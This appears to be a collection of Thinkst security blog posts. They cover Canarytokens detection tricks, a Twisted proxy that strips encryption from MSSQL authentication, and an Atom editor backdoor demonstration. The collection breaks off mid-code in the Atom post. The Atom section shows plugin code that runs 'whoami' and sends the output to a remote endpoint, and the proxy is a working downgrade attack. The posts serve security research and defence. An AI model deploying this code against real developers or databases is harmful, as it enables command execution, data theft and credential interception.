
Canarytokens.org - Quick, Free, Detection for the Masses


Introduction

This is part 2 in a series of posts on our 2015 BlackHat talk, and covers our Canarytokens work.

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
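For reference, a classic web bug boils down to a single tag like the one below (the hostname and unique path are placeholders): any GET request for that unique URL tells you the mail was opened.

<!-- 1x1 tracking image; the request for this unique URL is the alert -->
<img src="https://your-token-server.example.com/img/unique-token-id.gif" width="1" height="1">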

Imagine doing that, but for file reads, database queries, process executions, patterns in log files, Bitcoin transactions or even Linkedin Profile views. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.


Unicorns, Startups and Hosted Email

A few days ago, @jack (currently the CEO of both Square && Twitter) posted a pic of his iPhone.

[original tweet]
It struck me as slightly surprising that both Square & Twitter could be using Gmail. Both companies have a ton of talent who deeply understand message delivery and message queues. I wouldn't be at all surprised if both companies employ people who worked on Sendmail or Postfix. On some levels, Twitter competes with Google (and if Google Pay is a thing, then so does Square).

Of course this is one of those times when you see a classic mismatch between "paranoid security guy" thinking and "scale quick Silicon Valley" thinking. The paranoid security guy thinks: "So every time a Twitter executive sends an email, people at Google can read it?" while the SV entrepreneur says: "It isn't core.. let's not spend engineering time on it at all".

I'm not going to make a call here on which route is better, but I did wonder how common it was. So I took a list of the current US/EU Unicorns and decided to check who handles their mail. What you get is the following:


Interestingly, about 60% of the current Unicorn set have their email handled by Gmail. A further 13.6% have their mail handled by outlook.com, which means about 70% of the current startups with billion-dollar valuations don't handle their own email.
The list of companies using Gmail in that set is:
If we avoid the hyper-focus on "Unicorns" and look elsewhere (like Business Insider's list of the 38 coolest startups) this percentage grows even bigger:


It is interesting that Gmail so completely dominates email handling, and it is equally surprising that so many companies have outsourced this function entirely. On this trajectory, it won't be long before we can stop calling it email, and can simply refer to it as gmail instead.
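If you'd like to run the same check yourself, it amounts to looking at MX records. A minimal sketch, assuming dnspython is installed (the domain list and provider matching are simplified placeholders):

import dns.resolver

def mail_provider(domain):
    # who receives mail for this domain?
    hosts = ' '.join(str(r.exchange).lower() for r in dns.resolver.resolve(domain, 'MX'))
    if 'google.com' in hosts or 'googlemail.com' in hosts:
        return 'Gmail'
    if 'outlook.com' in hosts:
        return 'outlook.com'
    return 'self-hosted / other'

for domain in ['example.com']:  # replace with your list of startup domains
    print(domain, mail_provider(domain))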

PS: Anyone want to buy a book on sendmail macros?


Stripping encryption from Microsoft SQL Server authentication


"Communication flow in the TDS 4.2 protocol" [msdn]
Our recent PyConZA talk had several examples of why Python is often an easy choice of language for us to quickly try things out. One example came from looking at network traffic of a client authenticating with Microsoft SQL Server (in order to simulate the server later). By default, we can't see what the authentication protocol looks like on the wire because the traffic is encrypted. This post is a brief account of stripping that encryption with a little help from Python's Twisted framework.

The clean overview of the authentication protocol on MSDN suggests that it would be as easily readable as its diagram. Our first packet captures weren't as enlightening. Only the initial connection request messages from the client and server were readable. Viewing the traffic in Wireshark showed several further messages without a hint that the payloads were encrypted. A clearer hint was in the MSDN description of the initial client and server messages. There's a byte field in the header called ENCRYPTION. By default, both the client's and the server's byte is set to ENCRYPT_OFF (0x00), which actually means encryption is supported but just turned off. Once both endpoints are aware that the other supports encryption, they begin to upgrade their connection.

Initial packet capture: upgrading to encrypted connection begins after initial pre-login messages

For our purposes, it would be better if ENCRYPTION fields were set to ENCRYPT_NOT_SUP(0x02), so that the server thinks the client doesn't support encryption and vice versa. We hacked together a crude TCP proxy to do this. We connect the client to the proxy, which in turn connects to the server and starts relaying data back and forth. The proxy watches for the specific string of bytes that mark the ENCRYPTION field from either client or the server and changes it. All other traffic passes through unaltered.

Proxying the MSSQL authentication

The proxy is built with Twisted, which simplifies the connection setup. Twisted's asynchronous/event-driven style of network programming makes it easy to match bytes in the traffic and flip a bit in the match before sending it along again. The match and replace takes place in the dataReceived methods, which Twisted calls with data being sent in either direction.
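A minimal sketch of the idea, assuming Twisted is installed (this is not the original tool; the server address and the byte marker are placeholders, and error handling/teardown are omitted):

from twisted.internet import protocol, reactor

SERVER_HOST, SERVER_PORT = '192.168.1.10', 1433  # placeholder: the real MSSQL server

def strip_encryption(data):
    # Placeholder match-and-replace: the real proxy matches the bytes marking the
    # PRELOGIN ENCRYPTION option and rewrites its value to ENCRYPT_NOT_SUP (0x02).
    MARKER = b'REPLACE-WITH-OBSERVED-BYTES'
    return data.replace(MARKER + b'\x00', MARKER + b'\x02', 1)

class ServerSide(protocol.Protocol):
    def __init__(self, client_side):
        self.client_side = client_side

    def connectionMade(self):
        self.client_side.server_side = self
        self.transport.write(self.client_side.buffered)  # flush anything the client sent early

    def dataReceived(self, data):
        # rewrite the server's ENCRYPTION option before relaying to the client
        self.client_side.transport.write(strip_encryption(data))

class ClientSide(protocol.Protocol):
    def connectionMade(self):
        self.server_side = None
        self.buffered = b''
        factory = protocol.ClientFactory()
        factory.protocol = lambda: ServerSide(self)
        reactor.connectTCP(SERVER_HOST, SERVER_PORT, factory)

    def dataReceived(self, data):
        # rewrite the client's ENCRYPTION option before relaying to the server
        data = strip_encryption(data)
        if self.server_side is None:
            self.buffered += data
        else:
            self.server_side.transport.write(data)

factory = protocol.ServerFactory()
factory.protocol = ClientSide
reactor.listenTCP(1433, factory)  # point the MSSQL client at this port
reactor.run()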

With the proxy in place, both sides think the other doesn't support encryption and the authentication continues in the clear.

Traffic between the proxy and the server of an unencrypted authentication


It's to be expected that opportunistic encryption of a protocol can be stripped by a MITM. Projects like tcpcrypt explicitly chose this tradeoff for interoperability with legacy implementations, in the hope of gaining widespread deployment of protection against passive eavesdropping. The reason for Microsoft SQL authentication going this route isn't spelled out, but it's possible that interoperability with older implementations was a concern.


Enterprise Security: The wood for the trees?

We have been talking a fair bit over the past few years on what we consider to be some of the big, hidden challenges of information security [1][2][3]. We figured it would be useful to highlight one of them in particular: focusing on the right things.

As infosec creeps past its teenage years we've found ourselves with a number of accepted truths and best practices. These were well intentioned and may hold some value (to some orgs), but can often be misleading and dangerous. We have seen companies with huge security teams, spending tens to hundreds of millions of dollars on information security, burning time, money and manpower on best practices that don't significantly improve the security posture of their organization. These companies invest in the latest products, attend the hottest conferences and look to hire smart people. They have dashboards tracking "key performance areas" (and some of them might even be in the green) but they still wouldn't hold up to about four days of serious attacker attention. All told, a single vulnerability/exploit would quite easily lead to the worst day of their lives (if an attacker bothered).

The "draining the swamp" problem.
"When you’re up to your neck in alligators, it’s easy to forget that the initial objective was to drain the swamp."

Even a cursory examination of the average infosec team in a company will reveal a bunch of activities that occupy time and incur costs, but are for the most part dedicated to fighting alligators. As time marches on and staff churn happens, it's entirely possible to end up with an entire team dedicated to fighting alligators (with nobody realising that they originally existed to drain the swamp).

How do I know if my organization is making this mistake too?
It is both easy and comfortable to be in denial about this. Fortunately, once considered, it is just as easy to determine where your organization sits on this spectrum.

The litmus test we often recommend is this:
Imagine the person (people, or systems) that matter most to your company (from a security point of view). The ones that would offer your adversaries the most value if compromised. Now, realistically try to determine how difficult it would be to compromise those people / systems.

In most cases, an old browser bug, some phishing emails and an afternoon's worth of effort will do it. I'd put that at about $1000 in attacker cost. Now it's time for you to do some calculations: if $1000 in attacker costs is able to hit you where you would hurt most, then it's a safe bet that you have been focusing on the wrong things.

How is this possible?
It's relatively easy to see how we got here. Aside from vendors who work hard to convince us that we desperately need whatever it is that they are selling, we have also suffered from a lack of the right kind of feedback loops. Attackers are blessed with inherently honest metrics and a strong positive feedback loop. They know when they break in, they know when they grab the loot and they know when they fail. Defenders are deprived of this immediate feedback, and often only know their true state when they are compromised. To make matters worse, due to a series of rationalizations and platitudes, we sometimes even manage to go through compromises without acknowledging our actual state of vulnerability.

Peter Drucker famously said:
"What gets measured gets managed, even when it’s pointless to measure and manage it, and even if it harms the purpose of the organization to do so"

We have fallen into a pattern of measuring (and managing) certain things. We need to make sure that those things _are_ the things that matter.

What can we do?
As with most problems, the first step lies in acknowledging the problem. A ray of hope here is that, in most cases, the problem doesn't appear to be an intractable one. In many ways, re-examining what truly matters for your organization can be genuinely liberating for the security team.

If it turns out that the Crown Jewels are a handful of internal applications, then defending them becomes a solvable problem. If the Crown Jewels turn out to be the machines of a handful of execs (or scientists) then defending them becomes technically solvable. What's needed though is the acute realization that patching 1000 servers on the corporate network (and turning that red dial on the dashboard to green) could pale in significance to giving your CFO a dedicated iOS device as his web browser *.

In his '99 keynote (which has held up pretty well) Dr Mudge admonished us to make sure we knew where the company's crown jewels were before we planned any sort of defense. With hamster wheels of patching, alerts and best practices, this is easily forgotten, and we are more vulnerable for it.


* Please don't leave a comment telling me how patching the servers _is_ more important than protecting the CFO. This was just one example. If your crown jewels are hittable through the corporate server farm (or dependent on the security of AD) then yes, that's where you should be focusing.

Certified Canarytokens: Alerts from signed Windows binaries and Office documents

As part of a talk at the ITWeb Security Summit last week, we discussed how to trigger email alerts when file signatures are validated with our Canarytokens project. Building on that alerting primitive, we can make signed executables that alert when run or signed Office documents that alert when opened. 


Canarytokens is our exploration of light-weight ways to detect when something bad has happened on the inside of a network. (It's not at all concerned with leaks across that dubious, non-existent line referred to as "the perimeter" of a network.) We built an extensible server for receiving alerts from passive tokens that are left lying around. Tokens are our unit of alerting. When a token URL is fetched or a token DNS name is queried, this triggers an alert via the Canarytokens server. With these (and other tokens) we set out to build alerts for more significant incidents.

Office Document Signatures


A security researcher, Alexey Tyurin, drew our attention to how opening signed Office documents can trigger token alerts. On opening a signed Word document, Office verifies the signature automatically with the certificate embedded in the document. A notable exception to this is when a document is opened with Protected View enabled (typically after the document is downloaded from the web or opened as an email attachment); in that case, the signature verification happens only after the user clicks to disable Protected View. During the verification, a URL from the certificate is fetched. We can set the retrieved URL to a token URL (which lets Canarytokens fire an alert to tip us off). The URL we set is in a field called Authority Information Access (AIA). This field tells the signature verifier where to fetch more information about the CA (such as intermediate CAs needed to verify the signing certificate).
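In OpenSSL terms, this is a one-line x509v3 extension on the tokened signing certificate; a sketch, with the token URL as a placeholder (the section name is illustrative):

[ v3_token ]
# AIA pointing the verifier at a Canarytokens URL, fetched during signature validation
authorityInfoAccess = caIssuers;URI:http://<your-canarytoken-url>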


Signed document that has already triggered an alert

Signing Word documents gives us  another way to alert when the document is opened. The previous technique, which is implemented on Canarytokens, uses a remote tracking image embedded in the document. While the document signing is not currently integrated in Canarytokens, it can easily be automated. This requires creating a throwaway CA with token URLs to generate a tokened signing certificate and then signing a document. Thanks to Tyurin, creating the CA is a short script. Signing the document programmatically can be tricky to get right. We've automated this by offloading the signing to the Apache POI library in a Java program.

It’s worth noting more closely how the token URL is hit: Office offloads the signature verification to the Microsoft CryptoAPI which is what hits the URL. (In our tests the User-Agent that hits the URL is Microsoft-CryptoAPI/6.1). We should be able to re-use this trick with other applications that offload the signature verification in this way.

Windows Executables Signatures


A signed copy of Wireshark
If signed documents could be used to trigger Canarytokens, we wondered where else this could work. Microsoft's Authenticode allows signing Windows PE files, such as executables and DLLs. The executables' signatures are verified on launch if the relevant setting is enabled in the security policy. The name of the setting is a mouthful: "System settings: Use Certificate Rules on Windows Executables for Software Restriction Policies". Our initial tests of signed .NET DLLs were able to trigger alerts when loaded by custom executables even without the setting enabled. However, if Authenticode can alert us when Windows executables have been launched, we have a uniquely useful way of knowing when binaries have been executed, without any endpoint solutions installed.

To deploy signed executables, all that is needed is to token executables that attackers routinely run, such as ipconfig.exe, whoami.exe and net.exe, to alert us to an attacker rummaging around where they shouldn't be. Zane Lackey's highly recommended talk (and slides) on building defenses in reaction to real world attack patterns makes the case for how alerts like these can build solid attacker detection.

The verification, just like in the Office document case, is offloaded to the Microsoft CryptoAPI. Signing certificates for the executables are produced in the same way. However, the signing certificate must also have the Code Signing key usage attribute set. Creating signed binaries is made simple by Didier Stevens' extensive work on Authenticode. This is integrated into Canarytokens to make signing a binary as simple as uploading a copy to sign, but is also available as a standalone tool from the source.
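As an aside, if you'd rather sign a binary yourself with a tokened certificate, a tool like osslsigncode can also do the job (this is an alternative route, not the tooling used above; file names are placeholders):

osslsigncode sign -certs tokened-signing.crt -key tokened-signing.key \
    -n "Network utility" -in ipconfig.exe -out ipconfig-signed.exe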


AIA fields of a signing certificate
To sign an executable on Canarytokens, you upload an executable to the site. The site will sign the binary with a tokened signing certificate. Simply replace the original executable with the tokened one and verify that signature verification for executables is enabled. An attacker who lands on the machine and runs the tokened executable will trigger the signature verification, which sends an alert email (via Canarytokens) to let you know that something bad has happened.

Many of our other canary tokens are built on top of application-specific quirks. Adobe Reader, for example, has the peculiar behaviour of pre-flighting certain DNS requests on opening a PDF file. What the Office document and executable signings point to is a more generic technique for alerting on signature (and certificate) validation. This is a more notable alerting primitive, and is likely more stable than application quirks, given that URL-fetching extensions are enshrined in certificate standards. Although in this post we've used the technique in only two places, more may be lying in wait.

Edited 2016-06-14: Thanks to Leandro in the comments and over email, this post has been updated with his observation that Office document signature verification won't happen automatically when the document opens Protected View.

Slack[ing] off our notifications

We :heart: Slack. The elderly in our team were IRC die-hards, but Slack even won them over (if for no other reason, for their awesome iOS changelogs).


Thanks to Slack integrations, its robust API and webhooks, we have data from all over filtering into our Slack, from exception reporting to sales enquiries. If it's something we need to know, we have it pushed through to Slack.


At the same time, our Canary product (which prides itself on helping you "Know. When it matters") was able to push out alerts via email, SMS or over its RESTful API. Canaries are designed from the ground up not to be loquacious, i.e. they don't talk much, but when they do, you should probably pay attention. Having them pipe their alerts into Slack seemed a no-brainer.


Our initial stab at this was simple: By allowing a user to enter the URL for a webhook in their Console, we could send events through to the Slack channel of their choosing.
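Under the hood, posting an alert to an incoming webhook is a single HTTP request. A minimal sketch in Python (the webhook URL and message are placeholders):

import requests

WEBHOOK_URL = 'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXX'  # placeholder

def post_alert(message):
    # incoming webhooks accept a JSON payload with a "text" field
    requests.post(WEBHOOK_URL, json={'text': message}).raise_for_status()

post_alert('Canary alert: port scan detected against finance-fileserver')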

[Screenshot: Thinkst Canary Console configuration page]


Of course, this wasn’t all that was needed to this get working. The user would first have to create their webhook. Typically, this would require the user to:

Click on his team name, and navigate to Apps & Integrations


Hit the slack apps page and navigate to “Build”


Be confused for a while before choosing “Make a custom integration”

Select “Incoming Webhooks”



At this point the user either:
1. Decides this is too much work and goes to watch Game of Thrones;
2. Goes to read the "Getting started" guide before ending up back at option 1; or
3. Chooses his destination channel and clicks "Add Incoming Webhooks Integration"


After all this, the user’s reward is a page with way more options than is required for our needs (from a developer's point of view, the options are a delight and the documentation is super helpful, but for an end user... Oy vey!)

Finally... the user can grab the webhook URL, and insert it in the settings page of their console.

(This isn’t the most complicated thing ever... It’s not as confusing as trying to download the JDK - but Canary is supposed to make our users' lives easier, not drive them to drink)

With a bit of searching, we  found the Slack Button.  

[Image: "Add to Slack" button]

This is Slack's way of allowing developers to make deploying integrations quick and painless. This means that our previous 8 step process (9 if you count watching Game of Thrones) becomes the following:

The User clicks on the “Add to Slack” button (above)

He is automatically directed to a page where he authorises the action (and chooses a destination channel) 



There is no step 3:



Of course, we do a little more work, to allow our users to easily add multiple integrations, but this is because we are pretty fanatical about what we do.

At the end of it though, 2 quick steps, and you too can have Canary goodness funnelled to one of your Slack channels!


At the moment, we simply use the incoming webhooks to post alerts into Slack but there is lots of room to expand using slash commands or bot users, and we heard that all the cool kids are building bots. (aka: watch this space!)  

P.S. If you are a client, visit /settings on your console to see the new functionality.

Cloud Canary Beta

Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version-2 with a bunch of new features. You really should check it out.

Since almost day one, customers have been asking for virtual Canaries.  We generally prefer doing one thing really well over doing multiple things "kinda ok", so we held off virtualising Canary for a long time. This changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries makes sense. Over the past couple of months we've been working to get Canaries virtualised, with a specific initial focus on Amazon's EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.

Introducing our Python API Wrapper



With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (Building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? Firstly you'll need to install our package:
  • Simply start up your favourite shell and run "pip install canarytools"
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in front of "canary.tools" in your Console's URL. For example, in https://testconsole.canary.tools/settings, "testconsole" is the domain.
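Instantiating the Console looks something like the following (a sketch; the argument names are assumptions based on the description above, so check the wrapper's documentation for the exact signature):

import canarytools

# API_KEY from the Console Setup page; CLIENT_DOMAIN is the bit before "canary.tools"
console = canarytools.Console(api_key='API_KEY', domain='CLIENT_DOMAIN')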

Alternatively a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current Users}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab this from the Canary Console API tab under Console Setup (This is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash-shell? No Problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:

From here it is straightforward to do things such as update all your devices, or even reboot them:
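A hedged sketch of what that looks like (method names are illustrative assumptions; see the documentation for the exact calls):

# fetch every device registered to the console
devices = console.devices.all()

for device in devices:
    print(device.name)
    device.update()  # push the latest Canary version to the bird (assumed method name)
    device.reboot()  # or power-cycle it (assumed method name)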

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of the incident is easy:

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:
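Along these lines (attribute and parameter names are assumptions; consult the documentation):

# print the source IP of every incident on the console
for incident in console.incidents.all():
    print(incident.src_host)

# acknowledge all incidents from a particular device that are 3 weeks or older
console.incidents.acknowledge(node_id='EXAMPLE_NODE_ID', older_than='3 weeks')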


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles. (You can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens simply call:

You can also create tokens:


Enable/disable your tokens:
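A consolidated sketch of the three operations above (listing, creating, enabling/disabling); the kind constant and parameters are assumptions, so treat this as illustrative:

# list all Canarytokens on the console
for token in console.tokens.all():
    print(token.memo)

# create a new token (a web/HTTP token in this sketch)
token = console.tokens.create(memo='Token on the finance share',
                              kind=canarytools.CanaryTokenKinds.HTTP)

# disable it, then enable it again
token.disable()
token.enable()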


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:
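Something like this (the method name is an assumption; check the documentation):

# whitelist an IP and destination port so that it no longer generates alerts
console.settings.whitelist_ip_port('10.0.0.2', '5000')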


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programmatic) interactions with our birds a breeze.




Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened an attempt to fetch the resource is made. This is the request which tickles the token-server, which leads to you being notified.

Because so many of us store content on Google Drive, we wanted to do something similar with Google Documents and Google Sheets. The embedded-image approach was possible in Google Sheets; however, image caching, coupled with weak API support for Google Documents, pushed us towards Google Apps Script.

Google Apps Script is a powerful Javascript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

The Apps Script files can be published in three different ways.

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create your own API endpoints to be used by a client application).

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document, 
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent, via an HTTP request, as a notification to the document owner.

A more detailed outline of each feature is given below.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. This service was used to send the requests needed to notify the document owner that the token'd document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor, create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use Hookbin for convenience.
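A sketch of such a notify function (the Hookbin URL is a placeholder; note that the viewer's address is only available to the script in some domain configurations):

function notify() {
  var payload = {
    owner: Session.getEffectiveUser().getEmail(),  // the document owner (the trigger runs as its installer)
    viewer: Session.getActiveUser().getEmail(),    // the user who opened the document
    locale: Session.getActiveUserLocale()
  };
  // send the details to our collection endpoint
  UrlFetchApp.fetch('https://hookb.in/your-endpoint', {
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify(payload)
  });
}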


Write a function which sends user information to an endpoint


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin) the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted, all that remains is for the document to be shared. You can share the document with specific people or with anyone on the internet. The only caveat is that the document needs to be shared with EDIT permissions, or else the script will not function correctly.

Every time the document is opened, a POST request will be sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy the triggers if any had been previously installed. Thus, the user with which the document was shared would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed to have EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete/edit the script and/or document.

We overcame this through some creativity and elbow grease.

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product; you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

A guide to Birding (aka: Tips for deploying Canaries)

Here's a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they are quick to deploy (under 5 minutes from the moment you unbox them), but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here (No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on twitter @thinkstCanary

BlackHat 2017 Series

[Update: jump to the end of the page for the series index]

Late July found Haroon and me sweating buckets inside an 8th storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slidedeck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing:


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing that chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience we took another crack at Cloud security. This time the main thrust of our talk was:


In our 2017 talk we touch on a bunch of ways in which security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs and we show how simple examples of insignificant issues in third parties boomerang into large headaches. We talk about software supply chains for your developers, via malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesc, persistence and logging disruption. Lastly we took an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss in not mentioning Atlassian's Daniel Grzelak who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition, as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS; it's one of 74 possible services you can run there.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor
  2. Disrupting AWS S3 Logging

All your devs are belong to us: how to backdoor the Atom editor

This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at ways to compromise your developers that you probably aren't defending against, by exploiting the plugins in their editors. We will therefore be exploring Atom, Atom plugins, how they work and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, that's even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But, when it comes to choosing an editor, everyone has their own views. Some prefer the modern editors like Atom or Sublime, while others are more die-hard/old-school and prefer to stick to Vim or Emacs. Whatever you choose, you'll most likely want to customize it in some way (if not, I am not sure I can trust you as a person, let alone a developer).

Plugins and Extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc) they also allow you a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever growing list of them (because who has the time to go back and delete old unused plugins?) Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, GitHub's shiny new editor. According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with its vast selection of packages. You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple hours I had not only published my first app, but had updated it to include a little bit of malicious code too. 

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required and how difficult would it be (do we need our app to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package you'd first create a useful non-malicious one that would create a large user base and then push an update that would inject the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package

This will give you a package with a simple toggle method that we will use later:

toggle: ->
  console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
  console.log 'touch-type-teacher was toggled!'
  console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's steps one and two done, showing how easy it is to publish and update your package. The next step was to see what could actually be done with your package.


That seems like a reasonable request

Step Three

Seeing as packages are built on node.js, the initial test was to see what modules we had access to.

The request package seemed a good place to start as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
  {spawn} = require 'child_process'
  test = spawn 'whoami'
  test.stdout.on 'data', (data) ->
    request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
      console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's send it commands to run dynamically! While we are at it, instead of only firing on toggling of our package, let's fire whenever a key is pressed.

First we'll need to hook onto the onChange event of the current editor:

module.exports = TouchTypeTeacher =
  touchTypeTeacherView: null
  modalPanel: null
  subscriptions: null
  editor: null

  activate: (state) ->
    @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
    @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
